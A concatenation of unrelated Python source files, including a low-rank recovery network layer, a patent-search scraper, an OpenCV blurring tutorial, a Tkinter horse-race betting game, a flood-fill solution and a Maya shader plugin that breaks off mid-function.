        Lo= self.c * Z - self.a * R
        # Lolist=[Lo]
        return [Lo, GA, y, r]
        # return [Lo, y, r, Lolist]
# return [Lo, y, r, Lolist]
class hidden_layer(nn.Module):
    """Subsequent unrolled low-rank recovery iteration.

    Unlike input_layer, the step parameters (u, a, c) are passed in --
    presumably shared or initialised externally; confirm at the call site.
    """
    # def __init__(self, in_features, out_features, indexs):
    def __init__(self, in_features, out_features, indexs, u, a, c):
        super(hidden_layer, self).__init__()
        self.indexs = indexs
        self.in_features = in_features
        self.out_features = out_features
        # self.u = nn.Parameter(0.5*torch.ones(1, 1))
        # self.a = nn.Parameter(0.1*torch.ones(1, 1))
        # self.c = nn.Parameter(0.5*torch.ones(1, 1))
        self.u=nn.Parameter(u)
        self.a=nn.Parameter(a)
        self.c=nn.Parameter(c)
        # self.gamma = nn.Parameter(0.1 * torch.ones(1, 1))
        # self.beta = nn.Parameter(0.1 * torch.ones(1, 1))

    def forward(self, inputs):
        Lo, GA, y, r = inputs
        # Gradient step on the data-fit term.
        G = At_Gaussian(y - A_Gaussian(Lo, GA), GA)
        # G = At(y - A(Lo, self.indexs), self.indexs, Lo)
        # Small diagonal jitter -- presumably to keep the SVD (LAPACK's
        # SBDSDC routine; see the bare string marker below) from failing on
        # near-degenerate inputs. Confirm with the original authors.
        err = (1e-6) * (torch.eye(self.in_features, self.in_features).cuda())
        R = Lo + self.u * G
        "SBDSDC"
        R = R + err
        # Rank-r truncation of R via SVD.
        u, s, v = torch.svd(R)
        v1=v.t()
        Z=torch.mm(torch.mm(u[: , 0:r], torch.diag(s[0:r])), v1[0:r , :])
        Lo= self.c * Z - self.a * R
        # Lolist.append(Lo)
        return [Lo, GA, y, r]
# for name, param in per.named_parameters():
# print(name, param.size())
|
# Here we will handle different errors
# this will help us to understand the problems of our neural network better
import sys
# Error codes and their messages for reporting neural-network problems.
ERROR_ARRAY_SIZES = 0
ERROR_ARRAY_SIZES_MSG = "Error: array sizes don't match "


def error(e, extra_explanation=None):
    """Dispatch on error code *e* and abort with the matching message."""
    if e == ERROR_ARRAY_SIZES:
        error_arrays_sizes(extra_explanation)


def error_arrays_sizes(extra_explanation=None):
    """Exit the program reporting mismatched array sizes.

    BUG FIX: *extra_explanation* may now be None/empty -- previously the
    default call raised TypeError when concatenating None to the message.
    """
    detail = ": " + extra_explanation if extra_explanation else ""
    sys.exit(ERROR_ARRAY_SIZES_MSG + detail)
|
import requests
import json
import os
current_dir = os.path.dirname(__file__)
class PatentMenuGetter():
    """Posts a search query to the Espacenet REST search endpoint and prints
    the raw response text."""

    def __init__(self):
        self.base_url = "https://worldwide.espacenet.com/3.2/rest-services/search?lang=en%2Cde%2Cfr&q=A61K38%2F00&qlang=cql&p_s=espacenet&p_q=A61K38%2F00"
        self.headers = {
            'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
            'Content-Type': 'application/json',
            #'EPO-Trace-Id': 's347yb-89q317-AAA-000000',
            'X-EPO-PQL-Profile': 'cpci',
            'Origin': 'https://worldwide.espacenet.com',
            'Sec-Fetch-Site': 'same-origin',
            'Sec-Fetch-Mode': 'cors',
            'Sec-Fetch-Dest': 'empty'
        }

    def request(self, param, data):
        """POST *data* (JSON-serialized) to the search endpoint.

        NOTE(review): *param* is currently unused (the query is baked into
        base_url), and verify=False disables TLS certificate checking.
        """
        sess = requests.session()
        # Warm-up HEAD request first -- presumably so the session acquires
        # cookies before the POST; confirm against the Espacenet flow.
        sess.head("https://worldwide.espacenet.com/patent/?EPOTraceID=igd8d7-u7u4s5&event=onSearchSubmit_adv-off&lgCC=en_EP&listView=text-only")
        payload = json.dumps(data)
        resp = sess.post(self.base_url, headers=self.headers, data=payload, verify=False)
        print(resp.text)
if __name__ == '__main__':
    # Load the request payload fixture and fire a single search request.
    fixture_path = os.path.join(current_dir, "tests", "resources", "menu_get_parameter.json")
    with open(fixture_path, 'r', encoding="utf8") as f:
        raw_json = f.read()
    parameter = json.loads(raw_json)
    getter = PatentMenuGetter()
    getter.request("A61K38%2F00", parameter)
|
from practice.models import City, RecentSearch
from practitioner.models import Specialization
def updateRecentSearches(city, spec):
    """Increment (or create) the hit counter for a (city, speciality) search.

    *city* and *spec* are slugs; the call is a no-op if either is empty.
    Raises City.DoesNotExist / Specialization.DoesNotExist for unknown slugs.
    """
    if city != '' and spec != '':
        citi = City.objects.get(slug=city)
        speciality = Specialization.objects.get(slug=spec)
        try:
            obj = RecentSearch.objects.get(city=citi, speciality=speciality)
            obj.hit_count += 1
            obj.save()
        # BUG FIX: the bare `except:` also swallowed database errors and
        # MultipleObjectsReturned; only a missing row should create one.
        except RecentSearch.DoesNotExist:
            RecentSearch.objects.create(city=citi, speciality=speciality, hit_count=1)
def get_review_details(reviews):
    """Average the five answer scores across *reviews*.

    Returns a dict with keys 'anw1'..'anw5' (per-question averages),
    'num_of_reviews', and 'total' (mean of the five averages). An empty
    review list yields all zeros.
    """
    count = len(reviews)
    answers_avg = {'anw{}'.format(q): 0 for q in range(1, 6)}
    answers_avg['num_of_reviews'] = count
    # Accumulate each question's score over all reviews.
    for review in reviews:
        for q in range(1, 6):
            answers_avg['anw{}'.format(q)] += getattr(review.answers, 'answer{}'.format(q))
    # Convert sums to averages and fold them into the overall total.
    total = 0
    for q in range(1, 6):
        if count:
            answers_avg['anw{}'.format(q)] = answers_avg['anw{}'.format(q)] / count
        total = total + answers_avg['anw{}'.format(q)]
    answers_avg['total'] = total / 5
    return answers_avg
|
# Image smoothing tutorial.
# Goals:
#   - Blur images with various low-pass filters.
#   - Apply a custom filter (2-D convolution) to an image.
#
# 2-D convolution (image filtering): hold the kernel over a pixel, sum the
# 25 pixels under it, take the average, and replace the centre pixel with
# that average; repeat for every pixel of the image.
import numpy as np
import cv2 as cv
from matplotlib import pyplot as plt

img = cv.imread('./images/test.jpg')
kernel = np.ones((5, 5), np.float32) / 25  # normalized 5x5 box filter
dst = cv.filter2D(img, -1, kernel)  # -1: keep the source image depth
plt.subplot(121)
plt.imshow(img)
plt.title('Original')
plt.xticks([])
plt.yticks([])
plt.subplot(122)
plt.imshow(dst)
plt.title('Averaging')
plt.xticks([])
plt.yticks([])
plt.show()

# Image blurring (smoothing)
# 1. Averaging: convolve with a normalized box filter via cv.blur(); each
#    pixel becomes the mean of its kernel neighbourhood.
img_3_1 = cv.imread('./images/test.jpg')
img_3_1 = img_3_1[:, :, [2, 1, 0]]  # reorder BGR -> RGB for matplotlib
blur = cv.blur(img_3_1, (5, 5))
plt.subplot(121)
plt.imshow(img_3_1)
plt.title('Original')
plt.xticks([])
plt.yticks([])
plt.subplot(122)
plt.imshow(blur)
plt.title('Blurred')  # BUG FIX: title was misspelled 'Blurrde'
plt.xticks([])
plt.yticks([])
plt.show()
# BUG FIX: cv.imshow requires a window name as its first argument; the
# original call cv.imshow(img_3_1) raised TypeError and aborted the script.
cv.imshow('image', img_3_1)
# Gaussian blur
blur = cv.GaussianBlur(img, (5, 5), 0)
# Median filtering
median = cv.medianBlur(img, 5)
# Bilateral filtering (edge-preserving)
blur = cv.bilateralFilter(img, 9, 75, 75)
|
from tkinter import *
from time import sleep
root = Tk()
##################Betting##########
def betH1():
    # Player 1 stakes £1 on horse 1 (if any balance remains); updates the
    # balance and stake labels, otherwise shows "No more bets".
    global totalMoney, H1bets
    if totalMoney > 0:
        totalMoney = totalMoney - 1
        lb.config(text=("£" + str(totalMoney)))
        H1bets = H1bets + 1
        lb1.config(text=("£" + str(H1bets)))
    else:
        w1.config(text=("No more bets"))

def betH2():
    # Player 1 stakes £1 on horse 2.
    global totalMoney, H2bets
    if totalMoney > 0:
        totalMoney = totalMoney - 1
        lb.config(text=("£" + str(totalMoney)))
        H2bets = H2bets + 1
        lb2.config(text=("£" + str(H2bets)))
    else:
        w1.config(text=("No more bets"))

def betH3():
    # Player 1 stakes £1 on horse 3.
    global totalMoney, H3bets
    if totalMoney > 0:
        totalMoney = totalMoney - 1
        lb.config(text=("£" + str(totalMoney)))
        H3bets = H3bets + 1
        lb3.config(text=("£" + str(H3bets)))
    else:
        w1.config(text=("No more bets"))

def betH4():
    # Player 1 stakes £1 on horse 4.
    global totalMoney, H4bets
    if totalMoney > 0:
        totalMoney = totalMoney - 1
        lb.config(text=("£" + str(totalMoney)))
        H4bets = H4bets + 1
        lb4.config(text=("£" + str(H4bets)))
    else:
        w1.config(text=("No more bets"))

def betH5():
    # Player 1 stakes £1 on horse 5.
    global totalMoney, H5bets
    if totalMoney > 0:
        totalMoney = totalMoney - 1
        lb.config(text=("£" + str(totalMoney)))
        H5bets = H5bets + 1
        lb5.config(text=("£" + str(H5bets)))
    else:
        w1.config(text=("No more bets"))

def betH6():
    # Player 1 stakes £1 on horse 6.
    global totalMoney, H6bets
    if totalMoney > 0:
        totalMoney = totalMoney - 1
        lb.config(text=("£" + str(totalMoney)))
        H6bets = H6bets + 1
        lb6.config(text=("£" + str(H6bets)))
    else:
        w1.config(text=("No more bets"))
##################Betting##########
######Pleyer 2########
def pbetH1():
    # Player 2 stakes £1 on horse 1 (if any balance remains); updates the
    # player-2 balance and stake labels, otherwise shows "No more bets".
    global ptotalMoney, pH1bets
    if ptotalMoney > 0:
        ptotalMoney = ptotalMoney - 1
        plb.config(text=("£" + str(ptotalMoney)))
        pH1bets = pH1bets + 1
        plb1.config(text=("£" + str(pH1bets)))
    else:
        w1.config(text=("No more bets"))

def pbetH2():
    # Player 2 stakes £1 on horse 2.
    global ptotalMoney, pH2bets
    if ptotalMoney > 0:
        ptotalMoney = ptotalMoney - 1
        plb.config(text=("£" + str(ptotalMoney)))
        pH2bets = pH2bets + 1
        plb2.config(text=("£" + str(pH2bets)))
    else:
        w1.config(text=("No more bets"))

def pbetH3():
    # Player 2 stakes £1 on horse 3.
    global ptotalMoney, pH3bets
    if ptotalMoney > 0:
        ptotalMoney = ptotalMoney - 1
        plb.config(text=("£" + str(ptotalMoney)))
        pH3bets = pH3bets + 1
        plb3.config(text=("£" + str(pH3bets)))
    else:
        w1.config(text=("No more bets"))

def pbetH4():
    # Player 2 stakes £1 on horse 4.
    global ptotalMoney, pH4bets
    if ptotalMoney > 0:
        ptotalMoney = ptotalMoney - 1
        plb.config(text=("£" + str(ptotalMoney)))
        pH4bets = pH4bets + 1
        plb4.config(text=("£" + str(pH4bets)))
    else:
        w1.config(text=("No more bets"))

def pbetH5():
    # Player 2 stakes £1 on horse 5.
    global ptotalMoney, pH5bets
    if ptotalMoney > 0:
        ptotalMoney = ptotalMoney - 1
        plb.config(text=("£" + str(ptotalMoney)))
        pH5bets = pH5bets + 1
        plb5.config(text=("£" + str(pH5bets)))
    else:
        w1.config(text=("No more bets"))
def pbetH6():
    # Player 2 stakes £1 on horse 6 (if any balance remains).
    global ptotalMoney, pH6bets
    if ptotalMoney > 0:
        ptotalMoney = ptotalMoney - 1
        plb.config(text=("£" + str(ptotalMoney)))
        # BUG FIX: previously incremented from player 1's stake
        # (pH6bets = H6bets + 1), corrupting player 2's horse-6 stake
        # and payout.
        pH6bets = pH6bets + 1
        plb6.config(text=("£" + str(pH6bets)))
    else:
        w1.config(text=("No more bets"))
################################################
def resetBets():
    """Zero both players' stakes on every horse and refresh all stake labels."""
    global H1bets, H2bets, H3bets, H4bets, H5bets, H6bets, pH1bets, pH2bets, pH3bets, pH4bets, pH5bets, pH6bets
    H1bets = H2bets = H3bets = H4bets = H5bets = H6bets = 0
    pH1bets = pH2bets = pH3bets = pH4bets = pH5bets = pH6bets = 0
    for stake_label in (lb1, lb2, lb3, lb4, lb5, lb6,
                        plb1, plb2, plb3, plb4, plb5, plb6):
        stake_label.config(text="£0")
def repayMoney(w):
    """Pay out 2:1 on the winning horse *w* (1-6) to both players, then reset
    all stakes and horse positions; finally refresh both balance labels."""
    global ptotalMoney, totalMoney, H1bets, H2bets, H3bets, H4bets, H5bets, H6bets, pH1bets, pH2bets, pH3bets, pH4bets, pH5bets, pH6bets
    p1_stakes = (H1bets, H2bets, H3bets, H4bets, H5bets, H6bets)
    p2_stakes = (pH1bets, pH2bets, pH3bets, pH4bets, pH5bets, pH6bets)
    if 1 <= w <= 6:
        totalMoney = totalMoney + (p1_stakes[w - 1] * 2)
        ptotalMoney = ptotalMoney + (p2_stakes[w - 1] * 2)
        resetBets()
        resetAllHorses()
    # Balance labels are refreshed even for an out-of-range winner number
    # (matching the original behavior).
    lb.config(text=("£" + str(totalMoney)))
    plb.config(text=("£" + str(ptotalMoney)))
##################Betting##########
##################Reset Horses Position##########
def resetAllHorses():
    """Move all six horse sprites back to the start line, one per lane."""
    horses = (firstHorse, secondHorse, thirdHorse, fourthHorse, fithHorse, sixthHorse)
    for lane, horse in enumerate(horses):
        canvas1.coords(horse, x, y + (laneWidth * lane))
def gameNotStarted():
    # Placeholder called when a horse key is pressed before "Play Game!".
    # NOTE(review): assigns a local that is never used -- effectively a no-op.
    generic=True
def enableOrDisableButtons(x):
    """Set the state of every bet button; *x* is "disable" or "enable".

    Any other keyword leaves the buttons untouched (as in the original).
    """
    if x == "disable":
        new_state = DISABLED
    elif x == "enable":
        new_state = NORMAL
    else:
        return
    for button in (b1, b2, b3, b4, b5, b6,
                   pb1, pb2, pb3, pb4, pb5, pb6):
        button.config(state=new_state)
def startGame():
    """Begin a race: zero all horse positions, lock betting, show the status."""
    global gameStarted, h1X, h2X, h3X, h4X, h5X, h6X
    h1X = h2X = h3X = h4X = h5X = h6X = 0
    enableOrDisableButtons("disable")
    gameStarted = True
    sleep(0.1)  # brief pause before the status message changes
    w1.config(text=("Race in progress"))
def eachButtonPress():
    # Called after every horse move: if any horse has passed the finish line
    # (x offset > 1120), stop the race, announce the winner, pay out both
    # players, and re-enable the bet buttons.
    global gameStarted, h1X, h2X, h3X, h4X, h5X, h6X
    ####print (h1X,h2X,h3X,h4X,h5X,h6X)
    if gameStarted == True:
        w1.config(text=("Race in progress"))
    if h1X > 1120:
        gameStarted = False
        w1.config(text=("Horse 1 Wins"))
        h1X = 0
        repayMoney(1)
        enableOrDisableButtons("enable")
    if h2X > 1120:
        gameStarted = False
        w1.config(text=("Horse 2 Wins"))
        h2X = 0
        repayMoney(2)
        enableOrDisableButtons("enable")
    if h3X > 1120:
        gameStarted = False
        w1.config(text=("Horse 3 Wins"))
        h3X = 0
        repayMoney(3)
        enableOrDisableButtons("enable")
    if h4X > 1120:
        gameStarted = False
        w1.config(text=("Horse 4 Wins"))
        h4X = 0
        repayMoney(4)
        enableOrDisableButtons("enable")
    if h5X > 1120:
        gameStarted = False
        w1.config(text=("Horse 5 Wins"))
        h5X = 0
        repayMoney(5)
        enableOrDisableButtons("enable")
    if h6X > 1120:
        gameStarted = False
        w1.config(text=("Horse 6 Wins"))
        h6X = 0
        repayMoney(6)
        enableOrDisableButtons("enable")
def resetValues():
    """Restore all game state: horse positions, stakes, balances, and flags."""
    global h1X, h2X, h3X, h4X, h5X, h6X, gameStarted, totalMoney, H1bets, H2bets, H3bets, H4bets, H5bets, H6bets, winner
    global ptotalMoney, pH1bets, pH2bets, pH3bets, pH4bets, pH5bets, pH6bets
    h1X = h2X = h3X = h4X = h5X = h6X = 0
    H1bets = H2bets = H3bets = H4bets = H5bets = H6bets = 0
    pH1bets = pH2bets = pH3bets = pH4bets = pH5bets = pH6bets = 0
    gameStarted = False
    # Both players start with a £10 balance.
    ptotalMoney = 10
    totalMoney = 10
    winner = False
def horse1move(event):
    # Key handler: advance horse 1 by 20px while a race is in progress, then
    # re-check the finish condition. Outside a race, just refresh the status.
    global h1X, winner
    if gameStarted == True:
        canvas1.move(firstHorse, 20, 0)
        h1X = h1X + 20
        #print(canvas1.coords(firstHorse))
        eachButtonPress()
    else:
        gameNotStarted()
        eachButtonPress()

def horse2move(event):
    # Same handler for horse 2.
    global h2X
    if gameStarted == True:
        canvas1.move(secondHorse, 20, 0)
        h2X = h2X + 20
        eachButtonPress()
    else:
        gameNotStarted()
        eachButtonPress()

def horse3move(event):
    # Same handler for horse 3.
    global h3X
    if gameStarted == True:
        canvas1.move(thirdHorse, 20, 0)
        h3X = h3X + 20
        eachButtonPress()
    else:
        gameNotStarted()
        eachButtonPress()

def horse4move(event):
    # Same handler for horse 4.
    global h4X
    if gameStarted == True:
        canvas1.move(fourthHorse, 20, 0)
        h4X = h4X + 20
        eachButtonPress()
    else:
        gameNotStarted()
        eachButtonPress()

def horse5move(event):
    # Same handler for horse 5.
    global h5X
    if gameStarted == True:
        canvas1.move(fithHorse, 20, 0)
        h5X = h5X + 20
        eachButtonPress()
    else:
        gameNotStarted()
        eachButtonPress()

def horse6move(event):
    # Same handler for horse 6.
    global h6X
    if gameStarted == True:
        canvas1.move(sixthHorse, 20, 0)
        h6X = h6X + 20
        eachButtonPress()
    else:
        gameNotStarted()
        eachButtonPress()
####
# Load the six horse sprite images (one per lane).
image1 = r".\Horses\Horse1.gif"
photo1 = PhotoImage(file=image1)
image2 = r".\Horses\Horse2.gif"
photo2 = PhotoImage(file=image2)
image3 = r".\Horses\Horse3.gif"
photo3 = PhotoImage(file=image3)
image4 = r".\Horses\Horse4.gif"
photo4 = PhotoImage(file=image4)
image5 = r".\Horses\Horse5.gif"
photo5 = PhotoImage(file=image5)
image6 = r".\Horses\Horse6.gif"
photo6 = PhotoImage(file=image6)
####
####BACKGROUND######
bimage1 = r".\background.gif"
bphoto1 = PhotoImage(file=bimage1)
bwidth1 = bphoto1.width()
bheight1 = bphoto1.height()
# Centre point of the background image on the canvas.
bx = (bwidth1) / 2
by = (bheight1) / 2
####BACKGROUND######
screen_width = root.winfo_screenwidth()
screen_height = root.winfo_screenheight()
# Canvas sized to the background image, spanning the right side of the grid.
canvas1 = Canvas(width=bwidth1, height=bheight1)  #Canvas(width=screen_width, height=screen_height)
canvas1.grid(row=1, column=2, rowspan=12, columnspan=10)
horseHeight = photo1.height()
horseWidth = photo1.width()
# NOTE(review): x comes from the sprite *height* and y from the *width* --
# looks swapped; confirm against the sprite dimensions.
x = horseHeight / 2
y = horseWidth / 2
# To add 1/6 of the background height (one lane per horse).
laneWidth = 0
laneWidth = (bheight1 / 6)
backgound = canvas1.create_image(bx, by, image=bphoto1)
firstHorse = canvas1.create_image(x, y + (laneWidth * 0), image=photo1)
secondHorse = canvas1.create_image(x, (y + (laneWidth * 1)), image=photo2)
thirdHorse = canvas1.create_image(x, (y + (laneWidth * 2)), image=photo3)
fourthHorse = canvas1.create_image(x, (y + (laneWidth * 3)), image=photo4)
fithHorse = canvas1.create_image(x, (y + (laneWidth * 4)), image=photo5)
sixthHorse = canvas1.create_image(x, (y + (laneWidth * 5)), image=photo6)
# Keyboard bindings: keys 1/2/3 and 8/9/0 drive the six horses.
root.bind('1', horse1move)
root.bind('2', horse2move)
root.bind('3', horse3move)
root.bind('8', horse4move)
root.bind('9', horse5move)
root.bind('0', horse6move)
resetValues()
fontforbets = "Sans 20"
# Player 1 bet buttons and stake labels (grid column 0).
b1 = Button(text="Bet Win (Key1)", command=betH1)
b1.grid(row=1, column=0)
lb1 = Label(root, text="£" + str(H1bets), font=fontforbets)
lb1.grid(row=2, column=0)
b2 = Button(text="Bet Win (Key2)", command=betH2)
b2.grid(row=3, column=0)
lb2 = Label(root, text="£" + str(H2bets), font=fontforbets)
lb2.grid(row=4, column=0)
b3 = Button(text="Bet Win (Key3)", command=betH3)
b3.grid(row=5, column=0)
lb3 = Label(root, text="£" + str(H3bets), font=fontforbets)
lb3.grid(row=6, column=0)
b4 = Button(text="Bet Win (Key8)", command=betH4)
b4.grid(row=7, column=0)
lb4 = Label(root, text="£" + str(H4bets), font=fontforbets)
lb4.grid(row=8, column=0)
b5 = Button(text="Bet Win (Key9)", command=betH5)
b5.grid(row=9, column=0)
lb5 = Label(root, text="£" + str(H5bets), font=fontforbets)
lb5.grid(row=10, column=0)
b6 = Button(text="Bet Win (Key0)", command=betH6)
b6.grid(row=11, column=0)
lb6 = Label(root, text="£" + str(H6bets), font=fontforbets)
lb6.grid(row=12, column=0)
################
# Player 2 bet buttons and stake labels (grid column 1).
pb1 = Button(text="Bet Win (Key1)", command=pbetH1)
pb1.grid(row=1, column=1)
plb1 = Label(root, text="£" + str(pH1bets), font=fontforbets)
plb1.grid(row=2, column=1)
pb2 = Button(text="Bet Win (Key2)", command=pbetH2)
pb2.grid(row=3, column=1)
plb2 = Label(root, text="£" + str(pH2bets), font=fontforbets)
plb2.grid(row=4, column=1)
pb3 = Button(text="Bet Win (Key3)", command=pbetH3)
pb3.grid(row=5, column=1)
plb3 = Label(root, text="£" + str(pH3bets), font=fontforbets)
plb3.grid(row=6, column=1)
pb4 = Button(text="Bet Win (Key8)", command=pbetH4)
pb4.grid(row=7, column=1)
plb4 = Label(root, text="£" + str(pH4bets), font=fontforbets)
plb4.grid(row=8, column=1)
pb5 = Button(text="Bet Win (Key9)", command=pbetH5)
pb5.grid(row=9, column=1)
plb5 = Label(root, text="£" + str(pH5bets), font=fontforbets)
plb5.grid(row=10, column=1)
pb6 = Button(text="Bet Win (Key0)", command=pbetH6)
pb6.grid(row=11, column=1)
plb6 = Label(root, text="£" + str(pH6bets), font=fontforbets)
plb6.grid(row=12, column=1)
###################
# Race controls and the two balance displays across the top row.
play = Button(text=("Play Game!"), font="Helvetica 15 bold italic", command=startGame)
play.grid(row=0, column=0, columnspan=2)
w1 = Label(root, text="Please place bets", font="Helvetica 30 bold italic")
w1.grid(row=0, column=2)
w2 = Label(root, text="p1 Balance:", font="Calibri 25 bold")
w2.grid(row=0, column=3)
lb = Label(root, text=("£" + str(totalMoney)), font="Calibri 20")
lb.grid(row=0, column=4)
pw2 = Label(root, text="p2 Balance:", font="Calibri 25 bold")
pw2.grid(row=0, column=5)
plb = Label(root, text=("£" + str(ptotalMoney)), font="Calibri 20")
plb.grid(row=0, column=6)
root.mainloop()
|
# -*- coding: utf-8 -*-
# @Time : 2018/11/15 14:41
# @Author : lishanshan
import unittest
from ddt import ddt, file_data
@ddt
class Testjson(unittest.TestCase):
    """Demonstrates ddt's @file_data: each entry of the referenced JSON file
    becomes one generated test case, passed in as *value*."""

    def setUp(self):
        pass

    @file_data('E:/脚本/Test_study/unittest/ddt_study_data/test_data_list.json')
    def testlist(self, value):
        # *value* is one element of the JSON list fixture.
        print(value)

    @file_data('E:/脚本/Test_study/unittest/ddt_study_data/test_data_dict.json')
    def testdict(self, value):
        # *value* is one value of the JSON dict fixture (keyed by test name).
        print(value)

if __name__ == '__main__':
    unittest.main()
"""
The `magpylib.display.plotly` sub-package provides useful functions for
convenient creation of 3D traces for commonly used objects in the
library.
"""
# Public factory functions re-exported from traces_base; kept in the same
# order as the import statement below.
__all__ = [
    "make_Arrow",
    "make_Ellipsoid",
    "make_Pyramid",
    "make_Cuboid",
    "make_CylinderSegment",
    "make_Prism",
    "make_Tetrahedron",
    "make_TriangularMesh",
]
from magpylib._src.display.traces_base import (
make_Arrow,
make_Ellipsoid,
make_Pyramid,
make_Cuboid,
make_CylinderSegment,
make_Prism,
make_Tetrahedron,
make_TriangularMesh,
)
|
'''
Question:
733. Flood Fill
Descrition:
An image is represented by a 2-D array of integers, each integer representing the pixel value of the image (from 0 to 65535).
Given a coordinate (sr, sc) representing the starting pixel (row and column) of the flood fill, and a pixel value newColor, "flood fill" the image.
To perform a "flood fill", consider the starting pixel, plus any pixels connected 4-directionally to the starting pixel of the same color as the starting pixel,
plus any pixels connected 4-directionally to those pixels (also with the same color as the starting pixel), and so on.
Replace the color of all of the aforementioned pixels with the newColor.
At the end, return the modified image.
Examples:
Input:
image = [[1,1,1],[1,1,0],[1,0,1]]
sr = 1, sc = 1, newColor = 2
Output: [[2,2,2],[2,2,0],[2,0,1]]
Explanation:
From the center of the image (with position (sr, sc) = (1, 1)), all pixels connected
by a path of the same color as the starting pixel are colored with the new color.
Note the bottom corner is not colored 2, because it is not 4-directionally connected
to the starting pixel.
'''
#Python3 Code:
class Solution:
    def floodFill(self, image: List[List[int]], sr: int, sc: int, newColor: int) -> List[List[int]]:
        """Flood-fill *image* in place from (sr, sc) with *newColor* (BFS).

        Every pixel 4-directionally connected to the start pixel and sharing
        its original color is recolored. Returns the (mutated) image.
        CLEANUP: the original carried two more, unreachable DFS variants
        after the first `return` -- dead code, removed here. The recursive
        helper `dfs` below is kept for any external callers.
        """
        old, m, n = image[sr][sc], len(image), len(image[0])
        # If the start pixel already has the target color, do nothing --
        # enqueueing it would otherwise loop forever.
        if old != newColor:
            q = collections.deque([(sr, sc)])
            while q:
                i, j = q.popleft()
                image[i][j] = newColor
                for x, y in ((i - 1, j), (i + 1, j), (i, j - 1), (i, j + 1)):
                    if 0 <= x < m and 0 <= y < n and image[x][y] == old:
                        q.append((x, y))
        return image

    def dfs(self, image, i, j, color, newColor):
        """Recursive DFS fill: recolor (i, j) if it matches *color* and
        spread to its in-bounds 4-neighbours."""
        m, n = len(image), len(image[0])
        if image[i][j] == color:
            image[i][j] = newColor
            if i >= 1:
                self.dfs(image, i - 1, j, color, newColor)
            if i + 1 < m:
                self.dfs(image, i + 1, j, color, newColor)
            if j >= 1:
                self.dfs(image, i, j - 1, color, newColor)
            if j + 1 < n:
                self.dfs(image, i, j + 1, color, newColor)
|
filepath = "sinhala.lexc"
RaNaroot = {}
with open(filepath) as fp:
for line in fp:
x=line.strip().split(' ')
if 'ල්්්්්්්්්්්්්්්්්්්්්්්ල' in x[0]:
RaNaroot[x[0]] = 0
filepath = "hunspell_roots"
with open(filepath) as fp:
for line in fp:
x=line.strip().split(' ')
if 'ල්ල' in x[0]:
RaNaroot[x[0]] = 0
filepath = "rootFile"
with open(filepath) as fp:
for line in fp:
x=line.strip().split(' ')
if 'ල්ල' in x[0]:
RaNaroot[x[0]] = 0
f = open('LLaWords', 'w')
for x in RaNaroot:
f.write(x+"\n")
f.close()
|
# NOTE(review): file handle is never closed; prefer a `with` block.
file = open('day5.txt')
numList = list(map(int, file.read().split("\n")))
# Parts 1 and 2

def getNumSteps(input):
    # Count jumps until the instruction pointer leaves the offset list.
    # Each visited offset is incremented, unless it is >= 3, in which case it
    # is decremented (the part-2 rule). Mutates *input* in place.
    # NOTE(review): the parameter name shadows the builtin `input`.
    count = 0
    nextIndex = 0
    nextValue = 0
    insideLoop = True
    while (insideLoop):
        if count == 0:
            # The very first jump is handled separately from the main loop.
            nextIndex = input[0]
            count += 1
            input[0] += 1 if nextIndex < 3 else (-1)
            # input[0] += 1
            if abs(nextIndex) < len(input):
                nextValue = input[nextIndex]
            else:
                insideLoop = False
                return count
        else:
            nextIndex += nextValue
            # NOTE(review): abs() lets a negative pointer wrap around via
            # Python's negative indexing instead of counting as "escaped" --
            # confirm this matches the puzzle's intended exit condition.
            if abs(nextIndex) < len(input):
                count += 1
                nextValue = input[nextIndex]
                input[nextIndex] += 1 if nextValue < 3 else (-1)
                # input[nextIndex] += 1
            else:
                print("Are we out yet?")
                insideLoop = False
                return count
    return count

print(getNumSteps(numList))
import sys
import maya.OpenMaya as OpenMaya
import maya.OpenMayaMPx as OpenMayaMPx
import maya.cmds as cmds
# Maya registration data for the Mitsuba dielectric surface shader node.
kPluginNodeName = "MitsubaDielectricShader"
kPluginNodeClassify = "shader/surface/"  # places the node among surface shaders
kPluginNodeId = OpenMaya.MTypeId(0x87034)  # node type id; must be unique across plug-ins
class dielectric(OpenMayaMPx.MPxNode):
    """Maya dependency node for a Mitsuba-style dielectric surface shader.

    The attribute handles below are populated by nodeInitializer().
    CLEANUP: the original created these MObjects as *locals* inside
    __init__, where they were immediately discarded; they are now proper
    class-level placeholders (the usual Maya plug-in idiom).
    """
    mIntIOR = OpenMaya.MObject()
    mExtIOR = OpenMaya.MObject()
    mInteriorMaterial = OpenMaya.MObject()
    mExteriorMaterial = OpenMaya.MObject()
    mReflectance = OpenMaya.MObject()
    mTransmittance = OpenMaya.MObject()
    mOutColor = OpenMaya.MObject()
    mOutTransparency = OpenMaya.MObject()

    def __init__(self):
        OpenMayaMPx.MPxNode.__init__(self)

    def compute(self, plug, block):
        """Viewport shading: output black color and a fixed 0.75 transparency."""
        if plug == dielectric.mOutColor:
            resultColor = OpenMaya.MFloatVector(0.0, 0.0, 0.0)
            outColorHandle = block.outputValue(dielectric.mOutColor)
            outColorHandle.setMFloatVector(resultColor)
            outColorHandle.setClean()
        elif plug == dielectric.mOutTransparency:
            outTransHandle = block.outputValue(dielectric.mOutTransparency)
            outTransHandle.setMFloatVector(OpenMaya.MFloatVector(0.75, 0.75, 0.75))
            outTransHandle.setClean()
        else:
            # Unknown plug: let Maya handle it.
            return OpenMaya.kUnknownParameter
def nodeCreator():
    # Factory handed to Maya at registration; returns a fresh node instance.
    return dielectric()
def nodeInitializer():
    """Create and register all static attributes of the dielectric node."""
    nAttr = OpenMaya.MFnNumericAttribute()
    eAttr = OpenMaya.MFnEnumAttribute()

    def _addMaterialFields(attr):
        # Enum entries shared verbatim by the interior and exterior material
        # attributes. Entry 0 ("Use Value") means: take the IOR from the
        # matching numeric attribute instead of a preset.
        fields = (
            "Use Value", "Vacuum - 1.0",
            "Helium - 1.00004",  # BUG FIX: label was misspelled "Helum"
            "Hydrogen - 1.00013", "Air - 1.00028", "Carbon Dioxide - 1.00045",
            "Water - 1.3330", "Acetone - 1.36", "Ethanol - 1.361",
            "Carbon Tetrachloride - 1.461", "Glycerol - 1.4729", "Benzene - 1.501",
            "Silicone Oil - 1.52045", "Bromine - 1.661", "Water Ice - 1.31",
            "Fused Quartz - 1.458", "Pyrex - 1.470", "Acrylic Glass - 1.49",
            "Polypropylene - 1.49", "BK7 - 1.5046", "Sodium Chloride - 1.544",
            "Amber - 1.55", "Pet - 1.575", "Diamond - 2.419",
        )
        for index, label in enumerate(fields):
